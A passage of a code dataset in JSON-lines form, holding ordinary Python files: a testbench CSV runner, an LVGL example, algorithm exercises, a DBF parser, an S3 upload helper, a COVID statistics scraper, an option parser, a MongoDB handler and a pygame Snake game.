.csv\".format(sys.argv[0]))\n exit()\n\ncsvIn = sys.argv[1]\ncsvOut = sys.argv[2]\n\n# test if the CSV in file exist\ncsvInFile = Path(csvIn)\nif not csvInFile.is_file():\n print(\"Error: {} specified doesn't exist\".format(csvIn))\n exit()\n\n# test if the CSV in file is a CSV and is the correct version with (header)\nif not csvIn.endswith('.csv'):\n print(\"Error: {} is not a CSV file make sure the file ends with '.csv'\".format(csvIn))\n exit()\n\nwith open(csvIn, 'r') as csvInFile:\n # check header parameter match the expected format\n if csvInFile.readline() != CSVIN_HEADER:\n print(\"Error: The file {} doesn't match the expected format (checkout the file {})\".format(csvIn, CSV_EXEMPLE_FILE))\n create_exemple()\n exit()\n\n # check the delimiter match the expected delimiter\n csvInFile.seek(0)\n dialect = csv.Sniffer().sniff(csvInFile.read(1024))\n if dialect.delimiter != CSV_DELIMITER:\n print(\"Error: the CSV row delimiter doesn't match the expected delimiter '{}' (checkout the file {})\".format(CSV_DELIMITER, CSV_EXEMPLE_FILE))\n create_exemple()\n exit()\n\n csvInFile.close()\n\n# test if the CSV out file path specified exist\ncsvOutPath = os.path.dirname(os.path.abspath(csvOut))\nif not Path(csvOutPath).is_dir():\n print(\"Error: the output file can't be created because {} is not a valid path\".format(csvOutPath))\n exit()\n\n# test if the CSV out file doesn't exist (if so ask authorisation to overwrite) \nif Path(csvOut).is_file():\n print(\"Warning: {} already exist do you want to overwrite it? (Yes/n)\".format(csvOut))\n answ = input()\n if answ != \"Yes\":\n csvOut = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H:%M:%S_result.csv')\n print(\"The output file will be saved as {}\".format(csvOut))\n else:\n print(\"The file will be overwritten\")\n # truncate the file\n with open(csvOut, \"w\") as f:\n f.close\n\n #combine_tmp_file(csvOut)\n #exit()\ntry:\n testlist = csv_parser(csvIn)\n connect(HOST, PORT)\n clear_tmp_file()\n\n for test in testlist:\n print(\"Starting test {}/{} ... \".format(test[\"testnum\"],len(testlist)), end='', flush=True)\n result = start_test(test)\n print(\"Done\",end='',flush=True)\n save_tmp(result, test)\n print(\" - Saved\")\n \n motor_speed(0)\n combine_tmp_file(csvOut)\n disconnect()\n\nexcept KeyboardInterrupt:\n motor_speed(0)\n disconnect()\n","repo_name":"Ghom/Testbench_server","sub_path":"utils/testbench-win.py","file_name":"testbench-win.py","file_ext":"py","file_size_in_byte":14132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14639024863","text":"def event_handler(evt):\n code = evt.get_code()\n obj = evt.get_target()\n\n if code == lv.EVENT.VALUE_CHANGED :\n id = obj.get_selected_btn()\n txt = obj.get_btn_text(id)\n\n print(\"%s was pressed\"%txt)\n\nbtnm_map = [\"1\", \"2\", \"3\", \"4\", \"5\", \"\\n\",\n \"6\", \"7\", \"8\", \"9\", \"0\", \"\\n\",\n \"Action1\", \"Action2\", \"\"]\n\nbtnm1 = lv.btnmatrix(lv.scr_act())\nbtnm1.set_map(btnm_map)\nbtnm1.set_btn_width(10, 2) # Make \"Action1\" twice as wide as \"Action2\"\nbtnm1.set_btn_ctrl(10, lv.btnmatrix.CTRL.CHECKABLE)\nbtnm1.set_btn_ctrl(11, lv.btnmatrix.CTRL.CHECKED)\nbtnm1.align(lv.ALIGN.CENTER, 0, 0)\nbtnm1.add_event_cb(event_handler, lv.EVENT.ALL, None)\n\n\n#endif\n","repo_name":"FASTSHIFT/X-TRACK","sub_path":"Software/X-Track/Simulator/LVGL.Simulator/lvgl/examples/widgets/btnmatrix/lv_example_btnmatrix_1.py","file_name":"lv_example_btnmatrix_1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":4772,"dataset":"github-code","pt":"7"} +{"seq_id":"36870147978","text":"#GenomicRangeQuery\n\n# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef mapLetterToInt(letter):\n if letter == 'A':\n return 1\n elif letter == 'C':\n return 2\n elif letter == 'G':\n return 3\n else:\n return 4\n\ndef solution(S, P, Q):\n # write your code in Python 3.6\n S_array = list(S)\n result_array = list()\n counter = 0\n for left_limit in P:\n result_array.append(mapLetterToInt(min(S_array[left_limit:Q[counter]+1])))\n counter = counter + 1\n #print(str(result_array))\n return result_array\n","repo_name":"skymankarfield/randomAlgorithmDevPractice","sub_path":"GenomicRangeQuery.py","file_name":"GenomicRangeQuery.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23197472466","text":"# -*- coding: latin-1 -*-\n\ndef dicNumeros( ) :\n numeros = \"\"\"DEFINE DBFBancos := 1\nDEFINE DBFClientes := 2\nDEFINE DBFCuentas := 3\nDEFINE DBFEmitidas := 4\nDEFINE DBFExApuntes := 5\nDEFINE DBFExPlantillas := 6\nDEFINE DBFExtras := 7\nDEFINE DBFIVA := 8\nDEFINE DBFMovBancos := 9\nDEFINE DBFOperaciones := 10\nDEFINE DBFPagos := 11\nDEFINE DBFParametros := 12\nDEFINE DBFProveedores := 13\nDEFINE DBFRecibidas := 14\nDEFINE DBFReferencias := 15\nDEFINE DBFRefApuntes := 16\nDEFINE DBFDiario := 17\nDEFINE DBFDiarioTxt := 18\nDEFINE DBFInformes := 19\nDEFINE DBFInfApun := 20\nDEFINE DBFVencimientos := 21\nDEFINE DBFERiva := 22\nDEFINE DBFFormDoc := 23\nDEFINE DBFFormHoja := 24\nDEFINE DBFTipoVtos := 25\nDEFINE DBFLBI := 26\nDEFINE DBFAjustes := 27\nDEFINE DBFArticulos := 28\nDEFINE DBFArticulosC := 29\nDEFINE DBFAlbEmi := 30\nDEFINE DBFAlbRec := 31\nDEFINE DBFAlbRep := 32\nDEFINE DBFAlbPre := 33\nDEFINE DBFAlbInv := 34\nDEFINE DBFApuntes := 35\nDEFINE DBFApuntesPre := 36\nDEFINE DBFFamilias := 37\nDEFINE DBFFamiliasC := 38\nDEFINE DBFDirectos := 39\nDEFINE DBFAlbPed := 40\nDEFINE DBFEtiCod := 41\nDEFINE DBFEtiDat := 42\nDEFINE DBFRecibos := 43\nDEFINE DBFFotos := 44\nDEFINE DBFActividad := 45\nDEFINE DBFAnalitica := 46\nDEFINE DBFAlbPedE := 47\"\"\"\n\n d = {}\n for linea in numeros.split( \"\\n\" ) :\n linea = linea.strip()\n li = linea.split( \" := \" )\n numero = int(li[1].strip())\n alias = li[0][10:].strip().upper()\n d[alias] = numero\n return d\n\nclass Campo :\n def __init__( self, dato ) :\n li = dato.split( \",\" )\n self.nombre = li[0].replace( '\"', \"\" ).strip()\n self.tipo = li[1].replace( '\"', \"\" ).strip()\n self.tam = int(li[2])\n self.dec = int(li[3])\nclass Indice :\n def __init__( self, dato ) :\n li = dato.split( \",\" )\n self.nombre = li[0].replace( '\"', \"\" ).strip()\n self.expresion = \",\".join( li[3:] ).replace( '[', \"\" ).replace( ']', \"\" ).strip()[:-1]\n \n\nclass DBF :\n def __init__( self, nombre ) :\n self.nombre = nombre\n self.alias = nombre\n self.campos = []\n self.indices = []\n self.numero = 0\n\ndef leeINI() :\n f = open( \"c:/mgd/programa/ini30/_DBFs35r31.ini\", \"rt\" )\n\n liDBF = []\n for x in f :\n x = x.strip().replace( \" \", \"\" )\n if \"//\" in x :\n x = x[:x.find(\"//\")].strip()\n if x :\n if x[0] == \"[\" :\n cl = x.replace( \"[\", \"\" ).replace(\"]\",\"\")\n dbf = DBF( cl )\n liDBF.append(dbf)\n elif \"=\" in x :\n li = x.split( \"=\" )\n clave = li[0]\n valor = li[1]\n if clave.lower() == \"alias\" :\n dbf.alias = valor\n elif clave in [ \"Campo\", \"Cuenta\" ] :\n if valor.startswith( \"?\" ) :\n valor = valor[1:]\n dbf.campos.append( Campo(valor) )\n elif clave == \"Indice\" :\n dbf.indices.append( Indice(valor) )\n\n f.close()\n\n d = dicNumeros()\n\n for dbf in liDBF :\n if dbf.alias.lower() not in [ \"empresas\", \"pargen\", \"repform\" ] :\n dbf.numero = d[dbf.alias.upper()]\n\n return liDBF\n\n","repo_name":"juckar/extenmgd","sub_path":"bin/codigo/Enlace/gen/DBFs.py","file_name":"DBFs.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39529395810","text":"import shutil\nfrom gzip import GzipFile\nfrom io import BytesIO\n\nimport boto\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\nfrom config import AWS_ACCESS_KEY_ID, AWS_BUCKET, AWS_SECRET_ACCESS_KEY\n\n\nclass S3(object):\n _connection = None\n\n @property\n def connection(self):\n if not self._connection and not AWS_ACCESS_KEY_ID:\n return\n\n if not self._connection:\n self._connection = S3Connection(\n AWS_ACCESS_KEY_ID,\n AWS_SECRET_ACCESS_KEY,\n calling_format=boto.s3.connection.OrdinaryCallingFormat()\n )\n return self._connection\n\n def file_size(self, filename):\n bkt = self.connection.get_bucket(AWS_BUCKET, validate=False)\n key = bkt.lookup(filename)\n if not key:\n raise KeyError(filename)\n return key.size\n\n def key(self, filename):\n bkt = self.connection.get_bucket(AWS_BUCKET, validate=False)\n key = Key(bkt)\n key.key = filename\n return key\n\n def put(self, filename, data, content_type=None, **meta):\n if not self.connection:\n return None\n key = self.key(filename)\n if content_type:\n key.content_type = content_type\n for k, v in meta.items():\n key.set_metadata(k, v)\n key.set_contents_from_string(data)\n return key\n\n def get(self, filename):\n if not self.connection:\n return None\n key = self.key(filename)\n return key.read()\n\n def delete(self, filename):\n if not self.connection:\n return None\n\n key = self.key(filename)\n if key.exists():\n key.delete()\n return True\n return False\n\n def public_url(self, filename, bucket_as_domain=True, protocol='https'):\n if bucket_as_domain:\n return f'{protocol}://{AWS_BUCKET}/{filename}'\n else:\n return self.key(filename).generate_url(expires_in=0, query_auth=False)\n\n def sign_url(self, filename, method='PUT', expire=600, headers=None):\n if not self.connection:\n return None\n\n return self.connection.generate_url(\n bucket=AWS_BUCKET,\n expires_in=expire,\n force_http=False,\n headers=headers,\n key=filename,\n method=method,\n query_auth=True,\n )\n\n def upload(\n self,\n filename,\n fileobj=None,\n gzip=False, # False or gzip compression level (0..9)\n content_type=None,\n signed_duration=36000,\n signed_method='GET',\n ):\n opened = False\n if not fileobj:\n fileobj = open(filename, 'r')\n opened = True\n\n try:\n if gzip in [None, False]:\n self.put(\n filename,\n fileobj.read(),\n content_type=content_type,\n **{'Content-Disposition': 'attachment; filename=' + filename}\n )\n else:\n if gzip is True:\n gzip = 7\n iofh = BytesIO()\n try:\n with GzipFile(filename, 'wb', gzip, iofh) as gzfileobj:\n shutil.copyfileobj(fileobj, gzfileobj)\n\n filename = '{}.gz'.format(filename)\n content_type = 'application/gzip'\n self.put(\n filename,\n iofh.getvalue(),\n content_type=content_type,\n **{'Content-Disposition': 'attachment; filename=' + filename}\n )\n finally:\n iofh.close()\n\n if signed_duration and signed_method:\n res = self.sign_url(filename, signed_method, signed_duration)\n return res\n\n return filename\n finally:\n if opened:\n fileobj.close()\n\n\ns3 = S3()\n","repo_name":"getdock/whitelist","sub_path":"app/upload/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"7"} +{"seq_id":"5372472607","text":"# Author: Patrick Shapard\r\n# Created: 04/04/2020\r\n# Updated: 04/05/2020\r\n# This script is used to calulate the mortality rate of the corona virus for the USA and each state\r\n# The data is pulled from https://www.worldometers.info website\r\n\r\n\r\nimport time\r\nimport logging\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom coronavirus.ClassesFuncs import CalcRate\r\nfrom coronavirus.ClassesFuncs import setup_logging_Enhanced\r\nfrom coronavirus.ClassesFuncs import countdown\r\n\r\n\r\nurl_link = 'https://www.worldometers.info/coronavirus/country/us/'\r\noutputFile = 'States_TestResults.txt'\r\nfile_name = 'CoronaVirsCalc_States'\r\n\r\n\r\ndef Get_data_per_state(url_link):\r\n \"\"\"Parses the data from url_link, calculates death rate and output to state logs \"\"\"\r\n URL = url_link\r\n page = requests.get(URL)\r\n soup = BeautifulSoup(page.text, 'lxml')\r\n rows = soup.find(\r\n class_=\"table table-bordered table-hover table-responsive usa_table_countries\").find_all('tr')[1:]\r\n\r\n for row in rows:\r\n cell = [i.text for i in row.find_all('td')]\r\n states, totals, death = cell[0], cell[1], cell[3]\r\n mylist = list([states, totals, death])\r\n for idx, value in enumerate(mylist):\r\n value = value.replace(\"\\n\", \"\")\r\n value = value.replace(\",\", \"\")\r\n value = value.replace(\" \", \"\")\r\n if idx == 0:\r\n state = value\r\n elif idx == 1:\r\n num_cases = int(value)\r\n elif idx == 2:\r\n num_deaths = str(value)\r\n if num_deaths != '':\r\n num_deaths = int(value)\r\n else:\r\n num_deaths = None\r\n\r\n if num_deaths is not None:\r\n death_rate = CalcTheRate(num_cases, num_deaths)\r\n else:\r\n death_rate = None\r\n CreateFile(state, death_rate, num_cases, num_deaths)\r\n OutPutToStateLog(state)\r\n\r\n\r\ndef CalcTheRate(num_cases, num_deaths):\r\n \"\"\"Receives three variables. calculates and returns the death and recover rates. \"\"\"\r\n rate_obj = CalcRate(num_cases, num_deaths)\r\n death_rate_raw = (rate_obj.death())\r\n death_rate = (format(death_rate_raw, '.2f'))\r\n return death_rate\r\n\r\n\r\ndef CreateFile(state, death_rate, num_cases, num_deaths):\r\n \"\"\"Receives 4 variables. Opens main log file and writes the variables in each state log\"\"\"\r\n TimeStamp = time.strftime(\"%m/%d/%Y_%H:%M:%S\")\r\n with open(outputFile, 'a') as f:\r\n f.write(\r\n f\"\\n{TimeStamp}: {state}: Total cases: {num_cases}, Total deaths: {num_deaths}, Death rate: {death_rate}%\")\r\n logging.info(\r\n f\"{state}: Total cases: {num_cases}, Total deaths: {num_deaths}, Death rate: {death_rate}%\")\r\n\r\n\r\ndef OutPutToStateLog(state):\r\n \"\"\"Open and reads main log file, States_TestResults.txt\r\n Searches main log file and retrieves data for each state\r\n and outputs the data to each state's log file \"\"\"\r\n filename = 'States_TestResults.txt'\r\n output_file = {state: 'c:\\\\Python38\\\\States\\\\logfile_' + state + '.txt'}\r\n\r\n for string, logfile in output_file.items():\r\n with open(filename) as outf:\r\n datafile = outf.readlines()\r\n string_found = [line for line in datafile if string in line]\r\n with open(logfile, 'w') as inf:\r\n for line in string_found:\r\n inf.write(line)\r\n\r\n\r\ndef main():\r\n setup_logging_Enhanced(file_name)\r\n Get_data_per_state(url_link)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"pshapard/CoronaVirus","sub_path":"CoronaVirsCalc_States.py","file_name":"CoronaVirsCalc_States.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11525129283","text":"#!/usr/bin/env python3\nimport sys\n\nclass SimpleOptionParser(object):\n \"\"\"Parses command line args and options into dict and list\"\"\"\n \n def __init__(self):\n self.option_value_dict = {}\n self.arg_list = []\n self.usage = \"\"\n\n self.equivalent_option_dict = {}\n\n self.no_parameter_option_list = []\n self.single_parameter_option_list = []\n\n self.TRUE = 'TRUE'\n\n def put_no_parameter_option(self, no_parameter_option):\n self.option_value_dict[no_parameter_option] = None\n self.no_parameter_option_list.append(no_parameter_option)\n\n def put_single_parameter_option(self, single_parameter_option):\n \"\"\"Declare -f as an option with a single parameter, for example\"\"\"\n self.option_value_dict[single_parameter_option] = None\n self.single_parameter_option_list.append(single_parameter_option)\n\n def store_equivalent_options(self, option, equivalent):\n \"\"\"Make -f and --foobar be the same options, for example\"\"\"\n # NOTE key: '--foobar' and value: '-f'. Note the reversed order\n self.equivalent_option_dict[equivalent] = option\n \n def add_usage_line(self, line):\n self.usage = self.usage + line + '\\n'\n\n def parse(self, input_arg_list):\n \"\"\"\n Parses input_arg_list into option_value_dict, equivalent_option_dict\n\n Returns:\n True if parsing was successful. False if not\n \"\"\"\n if (len(input_arg_list) == 1):\n print(self.usage)\n\n return True\n\n iterator = iter(input_arg_list)\n next(iterator) # pass the command\n\n while True:\n try: \n arg = next(iterator)\n except StopIteration:\n break # break out of while\n else:\n # Prepare option from arg as the key for the option_value_dict\n option = None\n if arg.startswith('--'):\n option = self.equivalent_option_dict[arg]\n\n # if invalid option starting with --, let if-elses below\n # generate error\n if option is None:\n option = arg\n elif arg.startswith('-'):\n option = arg\n else:\n option = None\n\n # NOTE option has the key, and arg has the original user input \n if option != None:\n if option in self.no_parameter_option_list:\n if self.option_value_dict[option] != None:\n print(\"Error: duplicate entry for option %s\" % arg)\n\n return False\n\n self.option_value_dict[option] = self.TRUE\n elif option in self.single_parameter_option_list:\n try:\n value = next(iterator)\n except StopIteration:\n print(\"Error: option %s has no parameter.\" % arg)\n \n return False\n else: \n if value.startswith('-'):\n print(\"Error: option %s does not have \\\n corresponding parameter.\" % arg)\n\n return False\n \n if self.option_value_dict[option] != None:\n print(\"Error: duplicate entry for option %s\" % arg)\n\n return False\n\n # if all conditions are passed\n self.option_value_dict[option] = value\n else:\n print(\"Error: invalid option %s\" % arg) \n\n return False\n \n else: # if arg is not option\n self.arg_list.append(arg)\n\n # end of try - except - else\n\n if len(self.arg_list) == 0: \n print(\"Error: no arguments entered.\")\n\n return False\n\n return True\n \n\n\"\"\"Example Code\"\"\"\nif __name__=='__main__':\n p = SimpleOptionParser()\n\n \"\"\"Prepare for parsing\"\"\"\n p.add_usage_line(\"Usage: application [options] ... [files] ...\")\n p.add_usage_line(\"\\t-t , --toggle No parameter option example\")\n p.add_usage_line(\"\\t-f , --foobar [number] Single parameter option example\")\n\n p.put_no_parameter_option('-t')\n p.store_equivalent_options('-t', '--toggle')\n\n p.put_single_parameter_option('-f')\n p.store_equivalent_options('-f', '--foobar')\n\n \"\"\"Parsing\"\"\"\n p.parse(sys.argv)\n\n \"\"\"Results\"\"\"\n print()\n print(\"# No parameter option list\")\n print(p.no_parameter_option_list)\n print(\"# Single parameter option list\")\n print(p.single_parameter_option_list)\n\n print()\n\n print(\"# option_value_dict\")\n print(p.option_value_dict)\n print(\"# equivalent_option_dict\")\n print(p.equivalent_option_dict)\n print(\"# arg_list\")\n print(p.arg_list)\n print(\"# usage\")\n print(p.usage)\n\n","repo_name":"jwsohn/SimpleOptionParser","sub_path":"python/src/simpleoptionparser.py","file_name":"simpleoptionparser.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38828166601","text":"import logging\nimport time\nfrom sys import stdout\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef wait_for_db(db_url):\n \"\"\"checks if database connection is established\"\"\"\n\n _local_engine = create_engine(db_url, echo=True)\n _LocalSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=_local_engine)\n\n up = False\n while not up:\n try:\n # Try to create session to check if DB is awake\n\n print('Waiting for database...')\n\n db_session = _LocalSessionLocal()\n db_session.execute(\"SELECT 1\")\n db_session.commit()\n\n print('DB Engine connected')\n\n except OperationalError as err:\n print(err)\n logging.error(f\"Connection error: connection to server at {db_url} failed: Connection refused\")\n logging.error('Waiting for reconnect...')\n up = False\n except Exception as err:\n logging.error(f\"Connection error: {err}\")\n up = False\n else:\n up = True\n db_session.close()\n\n time.sleep(5)\n","repo_name":"NwaforAugustine321/ktizo-backend","sub_path":"db/prestart.py","file_name":"prestart.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24201342659","text":"#\n# @lc app=leetcode.cn id=1 lang=python\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n hmap = {}\n for i,num in enumerate(nums):\n another_num = target-num\n if another_num in hmap.keys():\n return [hmap[another_num],i]\n hmap[num] = i\n return None\n# @lc code=end\n'''\n给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n\n你可以假设每种输入只会对应一个答案。但是,你不能重复利用这个数组中同样的元素。\n\n示例:\n\n 给定 nums = [2, 7, 11, 15], target = 9\n\n 因为 nums[0] + nums[1] = 2 + 7 = 9\n 所以返回 [0, 1]\n'''\n","repo_name":"eadasfa/LeetCode","sub_path":"1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8347935405","text":"from abstra_server.runtimes.dashes.program import PythonProgram\nfrom abstra_server.api.classes import DashJSON, SlotJSON\nimport unittest\n\ndash_page_state = {\"widgets\": {\"widgetA\": {\"value\": None}, \"widgetB\": {\"value\": None}}}\n\n\ndef prepare_program(slot_dict: dict):\n dash = DashJSON.from_dict(\n {\n \"path\": \"foo\",\n \"file\": \"\",\n \"layout\": {\n \"version\": \"0.2\",\n \"slot\": slot_dict,\n \"props\": {},\n },\n \"title\": \"foo\",\n }\n )\n program = PythonProgram(dash, \"print('hello world')\")\n program.root = SlotJSON(slot_dict)\n return program\n\n\nno_slots_layout = {\n \"widgetA\": {\n \"id\": \"widgetA\",\n \"type\": \"text-input\",\n \"props\": {\"label\": '\"label\"', \"placeholder\": '\"placeholder\"'},\n \"events\": {},\n \"colEnd\": 8,\n \"rowEnd\": 5,\n \"colStart\": 6,\n \"rowStart\": 3,\n \"variable\": None,\n }\n}\n\none_grid_layout = {\n \"gridBlock\": {\n \"id\": \"gridBlock\",\n \"type\": \"if-block\",\n \"row\": 1,\n \"height\": 5,\n \"order\": 0,\n \"props\": {\"condition\": \"True\"},\n \"slot\": {\n \"widgetA\": {\n \"type\": \"text-input\",\n \"props\": {\"label\": '\"label\"', \"placeholder\": '\"placeholder\"'},\n \"events\": {},\n \"rowStart\": 2,\n \"rowEnd\": 4,\n \"colStart\": 6,\n \"colEnd\": 8,\n \"id\": \"widgetA\",\n \"variable\": None,\n }\n },\n },\n}\n\n\nclass TestComputeWidgets(unittest.TestCase):\n def test_get_widget_simple_case(self):\n program = prepare_program(no_slots_layout)\n widget = program._PythonProgram__get_widget(\"widgetA\")\n self.assertEqual(widget.__dict__, no_slots_layout[\"widgetA\"])\n\n def test_get_widget_one_grid(self):\n program = prepare_program(one_grid_layout)\n widget = program._PythonProgram__get_widget(\"widgetA\")\n self.assertEqual(\n widget.__dict__, one_grid_layout[\"gridBlock\"][\"slot\"][\"widgetA\"]\n )\n","repo_name":"modaye/abstra-lib","sub_path":"tests/test_compute_widgets.py","file_name":"test_compute_widgets.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"9897496313","text":"import pymongo\nfrom pymongo.errors import AutoReconnect\nfrom pymongo.errors import NetworkTimeout\nfrom pymongo.errors import NotMasterError\nfrom Helper.JsonHandler import JsonHandler\nimport time\n\n'''DataBaseHandler connects to the mongoDB to fetch the replicas priority list'''\n\nclass DbHandler:\n\n def __init__(self):\n self._jsonHandler = JsonHandler()\n self._config = self._jsonHandler.LoadJson('Config.json')\n self._polling = True\n\n def GetStatusCollection(self):\n print(\"--->In Db Handler\")\n\n for attempts in range(self._config['dbReconnection']):\n try:\n Client = pymongo.MongoClient(self._config['connectionString'])\n dataBase = Client[self._config['dataBase']]\n collection = dataBase[self._config['collectionName']]\n self._polling = False\n return self._polling, collection\n except (AutoReconnect,NetworkTimeout) as ex:\n print(\"--->In Db Handler ex1\")\n print(str(ex))\n waitTime = 5.0*attempts\n self._polling = True\n time.sleep(waitTime)\n except Exception as ex:\n print(\"--->In Db Handler ex2\")\n print(str(ex))\n self._polling = True\n break\n return self._polling, None","repo_name":"amrishAK/DBB_gateway","sub_path":"Handler/DbHandler.py","file_name":"DbHandler.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29935279466","text":"#SNAKE BY NAGAARON#\r\n\r\n#FRAMEWORKS-------------------------------------------------------------------\r\n\r\nimport pygame\r\nimport random\r\n\r\n#CLASSES----------------------------------------------------------------------\r\n\r\n#Cube Class\r\nclass Cube(object):\r\n def __init__(self,x,y,color,dirnx=1,dirny=0,):\r\n self.pos = (x,y)\r\n self.dirnx = 1\r\n self.dirny = 0\r\n self.color = color\r\n self.r = 50\r\n def move(self,dirnx,dirny):\r\n self.dirnx = dirnx\r\n self.dirny = dirny\r\n self.pos =(self.pos[0]+self.dirnx*self.r, self.pos[1]+self.dirny*self.r)\r\n \r\n def draw(self,window):\r\n pygame.draw.rect(window,self.color,(self.pos[0],self.pos[1],self.r,self.r))\r\n \r\n#Snake Class\r\nclass Snake(object):\r\n \r\n body =[] \t # list of Cube Objects\r\n turns = {} # dictionary with tunrs\r\n \r\n def __init__(self,r):\r\n \r\n self.head = Cube(50,100,(255,0,0))\r\n self.body.append(self.head)\r\n self.dirnx = 0\r\n self.dirny = 0\r\n \r\n def move(self,window,s):\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_COMMA]:\r\n self.add_cube()\r\n \r\n if keys[pygame.K_SPACE]:\r\n self.reset()\r\n\r\n if keys[pygame.K_LEFT] and (self.dirnx != 1 and self.dirny != 0):\r\n self.dirnx = -1\r\n self.dirny = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_RIGHT] and (self.dirnx != -1 and self.dirny != 0):\r\n self.dirnx = 1\r\n self.dirny = 0\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_UP] and (self.dirnx != 0 and self.dirny != 1):\r\n self.dirnx = 0\r\n self.dirny = -1\r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n if keys[pygame.K_DOWN] and (self.dirnx != 0 and self.dirny != 1):\r\n self.dirnx = 0\r\n self.dirny = 1 \r\n self.turns[self.head.pos[:]] = [self.dirnx,self.dirny]\r\n\r\n for j,i in enumerate(self.body):\r\n p = i.pos[:]\r\n if p in self.turns:\r\n turn = self.turns[p]\r\n i.move(turn[0],turn[1])\r\n if j==len(self.body)-1:\r\n self.turns.pop(p)\r\n else:\r\n if i.dirnx == -1 and i.pos[0] <= 0:\r\n i.pos = (s-i.r,i.pos[1])\r\n elif i.dirnx == 1 and i.pos[0] >= s-i.r:\r\n i.pos = (0,i.pos[1])\r\n elif i.dirny == 1 and i.pos[1] >= s-i.r:\r\n i.pos = (i.pos[0],0)\r\n elif i.dirny == -1 and i.pos[1] <= 0:\r\n i.pos = (i.pos[0],s-i.r)\r\n else:\r\n i.move(i.dirnx,i.dirny)\r\n i.draw(window)\r\n if j !=0:\r\n if i.pos == self.body[0].pos:\r\n self.reset()\r\n \r\n \r\n def add_cube(self):\r\n\r\n dx = self.body[-1].dirnx\r\n dy = self.body[-1].dirny\r\n if dx == 0 and dy == -1:\r\n self.body.append(Cube(self.body[-1].pos[0],self.body[-1].pos[1]+self.body[-1].r,(255,0,0)))\r\n if dx == 0 and dy == 1:\r\n self.body.append(Cube(self.body[-1].pos[0],self.body[-1].pos[1]-self.body[-1].r,(255,0,0)))\r\n if dx == 1 and dy == 0:\r\n self.body.append(Cube(self.body[-1].pos[0]-self.body[-1].r,self.body[-1].pos[1],(255,0,0)))\r\n if dx == -1 and dy == 0:\r\n self.body.append(Cube(self.body[-1].pos[0]+self.body[-1].r,self.body[-1].pos[1],(255,0,0))) \r\n self.body[-1].dirnx = dx\r\n self.body[-1].dirny = dy\r\n\r\n def reset(self): \r\n self.head = Cube(2*self.head.r,2*self.head.r,(255,0,0))\r\n self.body = [self.head]\r\n self.turns ={}\r\n self.dirnx = 1\r\n self.dirny = 0\r\n \r\n#FUNCTIONS--------------------------------------------------------------------\r\n\r\ndef neues_essen(window,schlange):\r\n global essen\r\n if schlange.body[0].pos == essen.pos:\r\n schlange.add_cube()\r\n newx = essen.r*round(random.randint(0,450)/essen.r)\r\n newy = essen.r*round(random.randint(0,450)/essen.r)\r\n essen = Cube(newx,newy,(0,0,255))\r\n\r\n\r\n \r\ndef draw_grid(window,s,r):\r\n for x in range(0,s,r):\r\n pygame.draw.line(window,(255,255,255),(x,0),(x,s))\r\n pygame.draw.line(window,(255,255,255),(0,x),(s,x))\r\n\r\ndef draw_window(window,s,r,schlange,essen):\r\n window.fill((0,0,0))\r\n schlange.move(window, s)\r\n essen.draw(window)\r\n draw_grid(window,s,r)\r\n pygame.display.update()\r\n \r\ndef main_loop():\r\n global essen\r\n screen_width = 500\r\n row_width = 50\r\n game_on = True\r\n clock = pygame.time.Clock()\r\n window = pygame.display.set_mode((screen_width,screen_width))\r\n pygame.display.set_caption(\"Snake\")\r\n essen = Cube(row_width*round(random.randint(0,450)/row_width),row_width*round(random.randint(0,450)/row_width),(0,0,255))\r\n schlange = Snake(row_width)\r\n while game_on:\r\n clock.tick(10)\r\n e_in_s = True\r\n draw_window(window,screen_width,row_width,schlange,essen)\r\n neues_essen(window,schlange)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\nmain_loop() \r\n","repo_name":"nagaaron/Snake","sub_path":"snake_nagaaron.py","file_name":"snake_nagaaron.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28822351145","text":"import pandas as pd\nimport numpy as np\nimport logging\nimport 